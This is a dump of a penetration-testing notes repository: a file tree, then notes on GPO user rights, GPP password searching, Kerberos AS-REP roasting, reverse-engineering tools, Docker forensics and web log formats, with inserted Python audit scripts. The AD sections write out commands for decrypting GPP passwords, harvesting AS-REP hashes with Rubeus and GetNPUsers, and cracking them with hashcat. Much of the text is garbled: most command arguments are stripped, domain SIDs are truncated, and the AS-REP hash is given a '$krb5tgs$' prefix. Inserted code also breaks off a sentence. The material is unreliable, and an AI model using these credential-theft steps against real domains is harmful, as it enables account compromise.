```
├── .gitignore
├── Active_Directory
│   ├── Exploitation-ACL_exploiting.md
│   ├── Exploitation-Azure_AD_Connect.md
│   ├── Exploitation-Certificate_Services.md
│   ├── Exploitation-Credentials_theft_shuffling.md
│   ├── Exploitation-DC_CVE.md
│   ├── Exploitation-GPO_users_rights.md
│   ├── Exploitation-GPP_and_shares_searching.md
│   ├── Exploitation-Kerberos_AS_REP_Roasting.md
│   ├── Exploitation-Kerberos_Kerberoasting.md
│   ├── Exploitation-Kerberos_Silver_Tickets.md
│   ├── Exploitation-Kerberos_delegations.md
│   ├── Exploitation-Kerberos_tickets_usage.md
│   ├── Exploitation-NTLM_capture_and_relay.md
│   ├── Exploitation-Operators_to_Domain_Admins.md
│   ├── Exploitation-Password_spraying.md
│   ├── Exploitation-gMS_accounts.md
│   ├── Post_Exploitation-Kerberos_Golden_Tickets.md
│   ├── Post_Exploitation-Persistence.md
│   ├── Post_Exploitation-Trusts_hopping.md
│   ├── Post_Exploitation-ntds_dit_dumping.md
│   ├── Recon-AD_scanners.md
│   └── Recon-Domain_Recon.md
├── Android
│   └── Static_Analysis.md
├── BinExploit
│   ├── Linux
│   │   └── ELF64_ROP_leaks.md
│   └── Reverse.md
├── Cloud
│   └── Azure.md
├── DFIR
│   ├── Cloud
│   │   ├── AWS.md
│   │   ├── Azure.md
│   │   └── README.md
│   ├── Common
│   │   ├── Browsers_forensics.md
│   │   ├── Docker_forensics.md
│   │   ├── Email_forensics.md
│   │   ├── Image_acquisition_and_mounting.md
│   │   ├── Memory_forensics.md
│   │   └── Web_logs_analysis.md
│   ├── Linux
│   │   ├── README.md
│   │   ├── TTPs_Analysis
│   │   │   ├── README.md
│   │   │   └── Timestomping.md
│   │   └── _Artefacts_overview.md
│   ├── Tools
│   │   ├── Dissect.md
│   │   ├── KAPE.md
│   │   ├── README.md
│   │   ├── Splunk.md
│   │   ├── Velociraptor.md
│   │   └── plaso.md
│   └── Windows
│       ├── Artefacts
│       │   ├── Amcache.md
│       │   ├── EVTX.md
│       │   ├── Jumplist.md
│       │   ├── LNKFile.md
│       │   ├── MFT.md
│       │   ├── MISC.md
│       │   ├── Outlook_files.md
│       │   ├── Prefetch.md
│       │   ├── RecentFilecache.md
│       │   ├── RecycleBin.md
│       │   ├── SRUM.md
│       │   ├── Shellbags.md
│       │   ├── Shimcache.md
│       │   ├── Timestamps.md
│       │   ├── User_Access_Logging.md
│       │   ├── UsnJrnl.md
│       │   └── _Artefacts_overview.md
│       ├── README.md
│       └── TTPs_Analysis
│           ├── Accounts_usage.md
│           ├── ActiveDirectory_persistence.md
│           ├── ActiveDirectory_replication_metadata.md
│           ├── EVTX_integrity.md
│           ├── Lateral_movement.md
│           ├── Local_persistence.md
│           ├── PowerShell_activity.md
│           ├── Program_execution.md
│           ├── README.md
│           ├── System_uptime.md
│           └── Timestomping.md
├── General
│   ├── External_recon.md
│   ├── File_Transfer.md
│   ├── Passwords_cracking.md
│   ├── Pivoting.md
│   ├── Ports_scan.md
│   └── Shells.md
├── L7
│   ├── 1-Methodology.md
│   ├── 1099_JavaRMI
│   │   └── Methodology.md
│   ├── 111-2049_NFS
│   │   └── Methodology.md
│   ├── 11211_memcached
│   │   └── Methodology.md
│   ├── 113_Ident
│   │   └── Methodology.md
│   ├── 135_MSRPC
│   │   └── Methodology.md
│   ├── 137-139_NetBIOS
│   │   └── Methodology.md
│   ├── 1433_MSSQL
│   │   └── Methodology.md
│   ├── 1521_ORACLE_DB
│   │   └── Methodology.md
│   ├── 161_SNMP
│   │   └── Methodology.md
│   ├── 21_FTP
│   │   └── Methodology.md
│   ├── 22_SSH
│   │   └── Methodology.md
│   ├── 25_SMTP
│   │   └── Methodology.md
│   ├── 27017-27018_MongoDB
│   │   └── Methodology.md
│   ├── 3128_Proxy
│   │   └── Methodology.md
│   ├── 3306_MySQL
│   │   └── Methodology.md
│   ├── 3389_RDP
│   │   └── Methodology.md
│   ├── 389-3268_LDAP
│   │   └── Methodology.md
│   ├── 445_SMB
│   │   └── Methodology.md
│   ├── 512-513_REXEC-RLOGIN
│   │   └── Methodology.md
│   ├── 53_DNS
│   │   └── Methodology.md
│   ├── 554_RTSP
│   │   └── Methodology.md
│   ├── 5985-5986_WSMan
│   │   └── Methodology.md
│   ├── 8000_JDWP
│   │   └── Methodology.md
│   └── 9100_Printers
│       └── Methodology.md
├── Linux
│   ├── Local_privilege_escalation.md
│   └── Post_exploitation.md
├── Miscellaneous
│   ├── Coverage_guideded_fuzzing.md
│   ├── Regex101.md
│   └── WinDbg_kernel.md
├── README.md
├── Red_Team
│   ├── Cobalt_Strike.md
│   ├── EDR_bypass_with_EDRSandBlast.md
│   ├── OpSec_OperatingSystems.md
│   └── Phishing_OfficeDocuments.md
├── SUMMARY.md
├── WebApps
│   ├── CMS_and_softwares
│   │   ├── ColdFusion.md
│   │   ├── DotNetNuke.md
│   │   ├── Jenkins.md
│   │   ├── Jira.md
│   │   ├── Ovidentia.md
│   │   ├── README.md
│   │   ├── WebDAV.md
│   │   └── WordPress.md
│   ├── Exploitation-Authentication.md
│   ├── Exploitation-File_upload.md
│   ├── Exploitation-GraphQL.md
│   ├── Exploitation-LDAP_injections.md
│   ├── Exploitation-Local_and_remote_file_inclusions.md
│   ├── Exploitation-NoSQL_injections
│   │   ├── NoSQLMap.md
│   │   ├── README.md
│   │   └── mongoDB.md
│   ├── Exploitation-Overview.md
│   ├── Exploitation-SQL_injections
│   │   ├── MSSQL.md
│   │   ├── MySQL.md
│   │   ├── README.md
│   │   ├── SQLMAP.md
│   │   └── SQLite.md
│   ├── Recon-Application_mapping.md
│   ├── Recon-Attack_surface.md
│   ├── Recon-Hostnames_discovery.md
│   └── Recon-Server_exposure.md
└── Windows
    ├── Bypass_AppLocker.md
    ├── Bypass_PS_ConstrainedLanguageMode.md
    ├── Lateral_movements
    │   ├── CrackMapExec.md
    │   ├── Local_credentials_reuse.md
    │   ├── Over_DCOM.md
    │   ├── Over_SMB.md
    │   ├── Over_WMI.md
    │   ├── Over_WinRM.md
    │   └── README.md
    ├── Local_privilege_escalation.md
    ├── Post_exploitation
    │   ├── Credentials_dumping.md
    │   ├── Defense_evasion.md
    │   ├── Local_persistence.md
    │   └── README.md
    └── Shellcode_and_PE_loader.md
```

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------

```
# Node rules:
## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
.grunt

## Dependency directory
## Commenting this out is preferred by some people, see
## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
node_modules

# Book build output
_book

# eBook build output
*.epub
*.mobi
*.pdf
```

--------------------------------------------------------------------------------
/Active_Directory/Exploitation-GPO_users_rights.md:
--------------------------------------------------------------------------------

# Active Directory - GPO users rights

### Overview

GPO can be used to assign `users rights` on the computer objects they are applied to.

User rights fall into two general categories:
- `logon rights`, which grant the specified user the right to log on and define the logon type.
- `privileges`, which define a number of specific privileges on the computer object.

The `user rights` that can be used to gain access to and/or compromise the computer objects they are applied to are detailed below.
Reviewing these user rights can lead to more vectors of credentials re-use, notably if user rights are defined for one of the following groups:
- `Everyone`, SID: `S-1-1-0`
- `Anonymous`, SID: `S-1-5-7`
- `Authenticated Users`, SID: `S-1-5-11`
- `Users`, SID: `S-1-5-32-545`
- `Domain Users`, SID: `S-1-5--513`
- `Domain Computers`, SID: `S-1-5--515`

### Find user rights assignments in GPO

###### Resultant Set of Policy

The Windows `gpresult` built-in utility can be used to compute the `Resultant Set of Policy (RSoP)` for the current, or specified, user on the local or a remote system. It can generate an `HTML` report referencing the parameters effectively applied by `GPO` on the system.

The `users rights` assigned can be found in `Computer Details -> Windows Setting -> Local Policies/User Rights Assignment`.

```
# Generates the RSoP for the current user on the local system.
gpresult /H

# Generates the RSoP for the specified user on the local system.
gpresult /user \ /H

# Generates the RSoP for the current or specified user on the remote system (using the given credentials, if any).
gpresult [/u /p ] /s [/user \] /H
```

###### Domain wide enumeration

The `Grouper2` C# application and `PingCastle`'s `healthcheck` can be used to enumerate user rights definitions in the most sensitive GPO.

```
Grouper2.exe -g -f
Grouper2.exe -d "" -u "" -p "" -s "\\\SYSVOL" -g -f
```

All the GPOs in the domain can also be exported in an `HTML` or `XML` report using the PowerShell `GroupPolicy` module's `Get-GPOReport` cmdlet:

```
# Export all the GPO in the specified domain using the current security context.
# runas /Netonly should be used for enumeration from a non-domain joined computer.

Get-GPOReport -All -ReportType [-Domain ] [-Server ] -Path
```

A more manual search in all the GPO accessible with the current privileges can be conducted directly in PowerShell:

```
# Conducting the search either from the current user context or using the specified credentials.
net use Z: \\\SYSVOL
net use Z: \\\SYSVOL /user:\
Get-ChildItem -Path Z:\ -Recurse -Force | Select-String SeInteractiveLogonRight,SeRemoteInteractiveLogonRight,SeImpersonatePrivilege,SeAssignPrimaryTokenPrivilege,SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeCreateTokenPrivilege,SeLoadDriverPrivilege,SeTakeOwnershipPrivilege,SeDebugPrivilege
net use Z: /delete
```

`PowerView` can be used to find where exploitable GPO are linked and **possibly** applied. Note: a GPO can be linked to an OU but not necessarily applied, as an OU can `block inheritance` of a GPO that is not `enforced`, or a conflicting GPO with a higher precedence order may supplant the exploitable GPO.

```
Get-DomainOU -GPLink "" | ForEach-Object {
    Get-DomainComputer -SearchBase "LDAP://$($_.distinguishedname)" | Ft Name
}
```

### User rights exploitation

###### Logon rights

The following logon rights can be defined to allow a user to log on to the computer:

| Right | Description | Exploitation technique |
|-------|-------------|------------------------|
| `SeInteractiveLogonRight` | Allows a user to connect locally on the computer | Requires physical access to the computer. |
| `SeRemoteInteractiveLogonRight` | Allows logon through Terminal Services | Interactive logon using an RDP client. |

Note that the `SeNetworkLogonRight` allows a user to access the exposed shares on the computer (under the restrictions of the shares and NTFS permissions) but is not sufficient by itself to remotely execute commands.
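As an added example that is not part of the original notes, the manual `Select-String` search above can be turned into a structured audit: each GPO's security settings live in SYSVOL under `<domain>\Policies\{GUID}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf`, whose `[Privilege Rights]` section lists every right with the SIDs it is granted to. The Python below parses that section and flags the rights listed in this note when they are granted to one of the broad groups from the overview; the `GptTmpl.inf` content is constructed and a mounted or copied SYSVOL is assumed for `audit_sysvol`.

```python
import configparser
import re
from pathlib import Path

# Rights this note lists as usable to gain access to, or escalate on, the computers a GPO applies to.
SENSITIVE_RIGHTS = {
    "SeInteractiveLogonRight", "SeRemoteInteractiveLogonRight",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
}

# Broad principals from the overview: well-known SIDs, plus domain RIDs that follow the domain SID.
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-7": "Anonymous",
              "S-1-5-11": "Authenticated Users", "S-1-5-32-545": "Users"}
BROAD_DOMAIN_RIDS = {"513": "Domain Users", "515": "Domain Computers"}
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")


def broad_group_name(principal):
    """Map a GptTmpl.inf principal ('*SID' or a bare name) to a broad group name, else None."""
    sid = principal.lstrip("*")  # SIDs are written with a leading '*' in the .inf file
    if sid in BROAD_SIDS:
        return BROAD_SIDS[sid]
    m = DOMAIN_SID_RE.match(sid)
    if m and m.group(1) in BROAD_DOMAIN_RIDS:
        return BROAD_DOMAIN_RIDS[m.group(1)]
    return None


def parse_privilege_rights(inf_text):
    """Return {right name: [principals]} from the [Privilege Rights] section of a GptTmpl.inf."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                   strict=False, allow_no_value=True)
    cp.optionxform = str  # keep the case of the right names (SeDebugPrivilege, ...)
    cp.read_string(inf_text)
    if not cp.has_section("Privilege Rights"):
        return {}
    return {right: [p.strip() for p in (value or "").split(",") if p.strip()]
            for right, value in cp.items("Privilege Rights")}


def find_broad_assignments(inf_text):
    """List (right, principal, group) for sensitive rights granted to one of the broad groups."""
    findings = []
    for right, principals in parse_privilege_rights(inf_text).items():
        if right not in SENSITIVE_RIGHTS:
            continue
        for principal in principals:
            group = broad_group_name(principal)
            if group:
                findings.append((right, principal, group))
    return findings


def audit_sysvol(root):
    """Audit every GptTmpl.inf below a mounted or copied SYSVOL; returns {path: findings}."""
    results = {}
    for inf in Path(root).rglob("GptTmpl.inf"):
        raw = inf.read_bytes()
        # The files are normally UTF-16 with a BOM; fall back to UTF-8 otherwise.
        text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8", "replace")
        findings = find_broad_assignments(text)
        if findings:
            results[str(inf)] = findings
    return results


# Constructed sample in GptTmpl.inf layout (not a real policy): one logon right and one
# privilege granted to broad groups, the others to Administrators (S-1-5-32-544).
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-11
SeRemoteInteractiveLogonRight = *S-1-5-32-555
SeBackupPrivilege = *S-1-5-21-1004336348-1177238915-682003330-513
SeDebugPrivilege = *S-1-5-32-544
"""

if __name__ == "__main__":
    for right, principal, group in find_broad_assignments(SAMPLE_GPTTMPL):
        print(f"{right} granted to {group} ({principal})")
```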

The `SeServiceLogonRight` is not directly exploitable either, as only users with administrative privileges can install and configure services.

The `SeBatchLogonRight` alone can not be used to remotely create and run scheduled tasks.

###### Privileges

The following privilege tokens can be used to locally elevate privileges to `NT AUTHORITY\SYSTEM`:
- `SeImpersonatePrivilege`
- `SeAssignPrimaryTokenPrivilege`
- `SeTcbPrivilege`
- `SeBackupPrivilege`
- `SeRestorePrivilege`
- `SeCreateTokenPrivilege`
- `SeLoadDriverPrivilege`
- `SeTakeOwnershipPrivilege`

The `SeDebugPrivilege` privilege can be used as well to directly dump the `LSASS` process.

Note that the exploitation of those privilege tokens
Refer to the `[Windows] Local privilege escalation` note for more information on how to exploit those privilege tokens.

--------------------------------------------------------------------------------

### References

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-xp/bb457125(v=technet.10)?redirectedfrom=MSDN

https://adsecurity.org/?p=3658

https://wald0.com/?p=179

https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

https://www.ssi.gouv.fr/uploads/IMG/pdf/Lucas_Bouillot_et_Emmanuel_Gras_-_Chemins_de_controle_Active_Directory.pdf

https://labs.f-secure.com/tools/sharpgpoabuse

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/15/group-policy-basics-part-2-understanding-which-gpos-to-apply/

--------------------------------------------------------------------------------
/Active_Directory/Exploitation-GPP_and_shares_searching.md:
--------------------------------------------------------------------------------

# Active Directory - GPO and shares searching

### Overview

The `SYSVOL` folder, accessible on all Domain Controllers to all authenticated users, should be carefully reviewed for sensitive information (notably the `Group Policy Preferences (GPP)` data). Some content may be accessible to unauthenticated users (`NULL session` or `GUEST`) and can be a way to gain authenticated access to the Domain.

###### SMB

The `Server Message Block (SMB)` protocol, one version of which was also known as `Common Internet File System (CIFS)`, is an application-layer network protocol used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.

###### Group Policy

`Group Policy` is a feature of the Microsoft `Windows NT` family of operating systems that controls the working environment of user accounts and computer accounts. `Group Policy` provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. A version of `Group Policy` called `Local Group Policy` (`LGPO` or `LocalGPO`) also allows `Group Policy Object (GPO)` management on standalone and non-domain joined computers.

Two kinds of `Group Policy` exist: `Group Policy Object (GPO)` and `Group Policy Preferences (GPP)`. One of the most useful features of the `GPP` is the ability to store and use credentials in several scenarios (local user creation, mapped drives, etc.). When a new `GPP` is created, an associated `XML` file is created in the `SYSVOL` share with the relevant configuration data and, if a password is provided, it is `AES-256` encrypted. Microsoft published the `AES` key which can be used to decrypt the password.
Since authenticated users (any domain user or users in a trusted domain) have read access to the `SYSVOL` share, anyone in the domain can search the `SYSVOL` share for `XML` files containing a `cpassword` field, which is the field that contains the `AES` encrypted password. There are a few more differences between the two; for additional details refer to the following article: http://techgenix.com/policies-vs-preferences/.

###### SYSVOL

The `SYSVOL` is the domain-wide share in Active Directory to which all authenticated users have read access. The `SYSVOL` contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since the `SYSVOL` is automatically synchronized and shared among all Domain Controllers).

In addition to the `GPP` data potentially containing passwords, more sensitive information can be stored in the `SYSVOL` share and its content should be reviewed.

### Group Policy Preferences (GPP) password searching

As stated above, `GPP` may be used in the domain to manage and configure local accounts on domain joined computers. The `GPP` defined may thus contain passwords and the `SYSVOL` folder should be reviewed.

`PingCastle`'s `healthcheck` searches a Domain Controller's `SYSVOL` share for any `XML` (`*.xml`) files that may contain a `cpassword` field and automatically decrypts any password found.
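As an added defensive check that is not part of the original notes, the Python below scans the four GPP XML file types that carry credentials (`groups.xml`, `scheduledtasks.xml`, `services.xml`, `datasources.xml`) for `cpassword` attributes and reports which entry and account are exposed, without decrypting anything, which is enough to locate the GPP to clean up; the `Groups.xml`-shaped input is constructed (placeholder clsid and cpassword values) and a mounted or copied SYSVOL is assumed for `scan_sysvol`.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP files that may carry a 'cpassword' attribute (the four types Get-GPPPassword looks for).
GPP_FILES = {"groups.xml", "scheduledtasks.xml", "services.xml", "datasources.xml"}


def find_cpasswords(xml_text):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        value = elem.get("cpassword")
        if not value:  # attribute absent, or emptied after the password was removed
            continue
        entry = parents.get(elem, elem)  # e.g. the <User> element wrapping <Properties>
        findings.append({
            "entry": entry.tag,
            "name": entry.get("name"),
            "changed": entry.get("changed"),
            # The attribute naming the account differs per GPP file type.
            "account": elem.get("userName") or elem.get("runAs") or elem.get("accountName"),
            "cpassword_len": len(value),
        })
    return findings


def scan_sysvol(root):
    """Scan a mounted or copied SYSVOL for GPP files exposing a cpassword; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*.xml"):
        if path.name.lower() not in GPP_FILES:
            continue
        try:
            findings = find_cpasswords(path.read_text(encoding="utf-8-sig"))
        except ET.ParseError:
            continue  # not well-formed XML: skip rather than abort the whole scan
        if findings:
            results[str(path)] = findings
    return results


# Constructed Groups.xml-shaped sample (clsid and cpassword values are placeholders, not real data):
# the first entry still carries a cpassword, the second had it cleared.
SAMPLE_GROUPS_XML = """<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="LocalAdmin"
        changed="2014-05-01 10:00:00" uid="{00000000-0000-0000-0000-000000000003}">
    <Properties action="U" userName="LocalAdmin" cpassword="Q29uc3RydWN0ZWRQbGFjZWhvbGRlclZhbHVl"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="Helpdesk"
        changed="2016-02-10 08:30:00" uid="{00000000-0000-0000-0000-000000000004}">
    <Properties action="U" userName="Helpdesk" cpassword="" acctDisabled="1"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{f['entry']} '{f['name']}' (account {f['account']}, changed {f['changed']}) exposes a cpassword")
```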

Additionally, the `Get-GPPPassword` cmdlet of the `PowerSploit` suite searches a Domain Controller's `SYSVOL` share for `groups.xml`, `scheduledtasks.xml`, `services.xml` and `datasources.xml` files and returns any (decrypted) `cpassword` passwords:

```
Get-GPPPassword
Get-GPPPassword -Server
```

To manually search for `cpassword` fields / passwords in `GPP`, the `Agent Ransack` GUI or the `SauronEye` CLI tools can be used. Refer to the `Distributed searching tools` section below for more information.

The Ruby `gpp-decrypt` script can be used to decrypt a GPP password:

```
gpp-decrypt
```

### Distributed shares searching

###### Enumerate accessible shares

The `PingCastle`'s `share` module can be used to enumerate the machines joined to the current, or specified, Active Directory domain and then retrieve the shares exposed by each machine through direct `SMB` queries.

```
PingCastle.exe --scanner share
PingCastle.exe --server --user "\" --password "" --scanner share
```

From an unauthenticated perspective, `nmap` can be used to conduct a network scan to enumerate exposed `SMB` services and to list the accessible shares on the accessible services:

```
nmap --script smb-enum-shares.nse -p 445
nbtscan -r
```

For more practical information about shares listing and searching, refer to the `[L7 SMB] - Methodology` note.

###### Distributed searching tools

The `Agent Ransack` GUI or `SauronEye` CLI file searching tools can be used to search files in `SMB` shares for specified keywords or regex, such as `pass*`, etc.

```
SauronEye.exe --directories <...> --filetypes <.FILE_EXTENSION> <...> --contents --keywords
```

--------------------------------------------------------------------------------
/Active_Directory/Exploitation-Kerberos_AS_REP_Roasting.md:
--------------------------------------------------------------------------------

# Active Directory - Kerberos AS_REP roasting

### Overview

An AS_REP roasting attack is an attack on the `Kerberos` authentication protocol that involves compromising the password of a user account that does not require `Kerberos` pre-authentication.

The attack is based on the fact that the `KRB_AS_REP` response, sent by the `KDC (Key Distribution Center)` in reply to an initial authentication request `KRB_AS_REQ` to the `Authentication Service (AS)`, contains ciphertext encrypted using the client's secret key.

By default, the `KRB_AS_REQ` must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user identity before the `KDC` returns a `KRB_AS_REP` response. This verification is omitted for user accounts that do not require `Kerberos` pre-authentication, i.e. accounts with the account property `DONT_REQ_PREAUTH`. The secrets of these user accounts are thus exposed to offline cracking attacks against the ciphertext, which are much faster and can not be time restricted.

### Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require `Kerberos` pre-authentication and the request and export of `KRB_AS_REP` responses for offline cracking.

In order to enumerate the domain user accounts, `Rubeus` / `GetNPUsers.py` must be started in a domain authenticated security context or provided with working domain credentials.

```
Rubeus.exe asreproast /outfile:
Rubeus.exe asreproast /format:john /outfile:

Rubeus.exe asreproast /creduser:'\' /credpassword:'' /dc: /domain: /outfile:

# Will attempt to request a TGT for all users.
GetNPUsers.py -request /[:]
```

### DONT_REQ_PREAUTH user accounts discovery

The following tools can be used to discover user accounts that do not require `Kerberos` pre-authentication:

```
Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
```

### Request and export of KRB_AS_REP responses

The following tools can be used to request and export `KRB_AS_REP` responses for user accounts that do not require `Kerberos` pre-authentication.

The following operations do not require the knowledge of valid credentials.

```
Rubeus.exe asreproast /user: /outfile:
Rubeus.exe asreproast /dc: /domain: /user: /outfile:

GetNPUsers.py '/' -usersfile
GetNPUsers.py '/' -dc-ip -usersfile -format john
```

### Offline cracking of KRB_AS_REP responses

Both `John the Ripper` (magnumripper fork) and `hashcat` can be used to crack the `KRB_AS_REP` responses.

The hash needs to respect the following format to be recognized by `hashcat`:

```
# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256

$krb5tgs$$*@:$85DA[...]
```

Depending on the tool used, the hash retrieved may need to be manually updated.

The following commands can be used to crack the `KRB_AS_REP` responses:

```
# It's recommended to use hashcat on a Windows OS for better performance due to driver compatibility.
hashcat64.exe -m 18200 -a 0 [-r ] '[ | ]'

john --wordlist=
```

--------------------------------------------------------------------------------

### References

https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
https://tools.ietf.org/html/rfc4120#page-60
https://beta.hackndo.com/kerberos-asrep-roasting/
https://adsecurity.org/?p=227

--------------------------------------------------------------------------------
/BinExploit/Reverse.md:
--------------------------------------------------------------------------------

### strings

The Linux `strings` utility and the Windows `sysinternals` `strings` utility can be used to extract the printable character sequences contained in a file, notably in non-text files.

By default, only the sequences that are at least 4 characters long are retrieved.

```
strings
```

### objdump

The GNU `objdump` command line utility can be used to disassemble the assembler contents of the executable sections of a binary:

```
objdump -d
```

### radare2

The `radare2` suite is an open source reverse engineering framework consisting of multiple tools and features.

The framework supports multiple architectures (i386,x86-64, ARM, etc.), file formats (PE, PE+, ELF, Mach-O, etc.) and operating systems (Windows, GNU/Linux, OS X, etc.).

The `rabin2` utility can be used to retrieve information and protection mechanisms of a binary:

```
rabin2 -I

radare2
[0xXXX] > iI
```

The strings in the binary can be printed and searched using `izz`:

```
[0xXXX] > izz
[0xXXX] > izz~
[0xXXX] > izz~password
```

The visual mode can be entered using the `v` command and quit using the `q` command. In visual mode, the `p` command can be used to switch between display modes.

### GDB

###### Binaries without debugging symbols

Debugging a binary compiled without debugging symbols ("no debugging symbols found") is possible as GDB can directly handle assembly code.

By default, GDB uses the AT&T assembly syntax. The following command can be used to switch to the Intel syntax:

```
set disassembly-flavor intel
```

To set up a breakpoint, the binary entry point can be retrieved using the GDB `info` command:

```
(gdb) info file
Entry point: 0xXXXXXX

b *0xXXXXXX
```

The `nexti` (shortcut `ni`) and `stepi` (shortcut `si`) commands are the assembly counterparts of the source-level `next` and `step` commands.

The `examine` (shortcut `x`) command can be used to display the assembly code after the breakpoint:

```
# N = number of assembly lines to print
# $pc = GDB variable for the program counter register

x/i $pc
x/5i $pc
```

### OllyDbg

`OllyDbg` is a GUI 32-bit assembler level analyzing debugger for Microsoft Windows.

The `Search for -> All referenced strings` functionality allows to retrieve all printable strings contained in the binary and their address location for breakpoint setting.

### dnSpy

`dnSpy` is a GUI debugger and assembly editor which can be used to debug 32- or 64-bit .NET applications and edit assemblies in C# or Visual Basic.

The GUI interface can be launched using the `dnSpy.exe` or `dnSpy-x86.exe` programs.

--------------------------------------------------------------------------------

### References

https://reverseengineering.stackexchange.com/questions/1935/how-to-handle-stripped-binaries-with-gdb-no-source-no-symbols-and-gdb-only-sho

--------------------------------------------------------------------------------
/DFIR/Cloud/README.md:
--------------------------------------------------------------------------------

# DFIR - Linux

--------------------------------------------------------------------------------
/DFIR/Common/Docker_forensics.md:
--------------------------------------------------------------------------------

# DFIR - Docker

### Image analysis

```bash
# Lists the images available.
docker image ls

# Automated analysis on the specified image, to retrieve a number of information: exposed service(s), Docker file, etc.
docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36

# Displays information on the specified image.
docker image inspect | jq

# Validates the trust on the specified image.
docker trust inspect | jq

# Prints the history of the commands used to build the image.
docker image history --no-trunc
# Adds timestamps to the commands history.
docker history --no-trunc --format "{{.CreatedAt}}: {{.CreatedBy}}"

# Extracts a specific file from an image without running a container.
container_id=`docker create `
docker cp $container_id:/

# Saves a docker image as a tar archive, containing for each layer of the image its metadata (Dockerfile-like) and files.
docker save -o
tar -xvf
cat /json | jq
```

--------------------------------------------------------------------------------
/DFIR/Common/Web_logs_analysis.md:
--------------------------------------------------------------------------------

# DFIR - Web logs analysis

### Webservers logs format

Webservers, such as `Apache` or `nginx`, usually follow known / standard log formats by default.

The following standard log formats are notably in use:

| Name | Template | Example | Remarks |
|------|----------|---------|---------|
| `Common Log Format (CLF)` | `%h %l %u %t "%r" %>s %b`<br><br>` <- \| IDENTITY> "" ` | `127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326` | A `-` indicates that the information is not present.<br><br>The `` field is not reliable and will often not be logged.<br><br>The `` field may not be indicated (`-`) even if the request was identified at a higher level. For instance, a `CMS`, such as `WordPress`, may not rely on webserver authentication and can identify users at the application level. In such a case, the webserver log, such as `Apache`'s, will not contain user information while the request was nonetheless duly authenticated. |
| `NCSA Combined Log Format` | `%h %l %u %t "%r" %>s %b "%{Referer}" "%{User-agent}"`<br><br>` <- \| IDENTITY> "" "" ""` | `127.0.0.1 - frank [10/Oct/2022:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"` | Identical to the `Common Log Format (CLF)` format, with the addition of the `Referer` and `User-agent` fields. |
| `IIS Log File Format` | | | |
| `W3C Extended Log File Format` | | | |

### Graphical web logs parsers / viewer

###### GoAccess

[`GoAccess`](https://goaccess.io/) is a C program that can be used to parse webserver logs to get a first level of statistics for the given logs: total requests, unique visitors, operating systems and browsers stats (if user-agent information is available), accessed endpoints, etc. `GoAccess` supports many web log formats (Apache, Nginx, Amazon S3, Elastic Load Balancing, CloudFront, etc.) and can output reports in `JSON`, `CSV` or `HTML`.

Statistics linked to specific IPs require first filtering the log files.

```bash
# Generates a static HTML report with statistics for the given input log file(s).
goaccess -o

# Filters the given log files on the specified IPs to generate a targeted statistics report.
grep -i "IP1\|...\|IPn" | goaccess -o
```

###### HTTP logs viewer

The [`http Logs Viewer`](https://www.apacheviewer.com/) application, formerly `Apache Logs Viewer`, supports various webserver logs (Apache, IIS, nginx, etc.) and allows filtering based on various fields.

Only limited functionalities are however available in the free version and some key features require the paid version ($20 for individuals, $70 for corporations as of 2022-08).
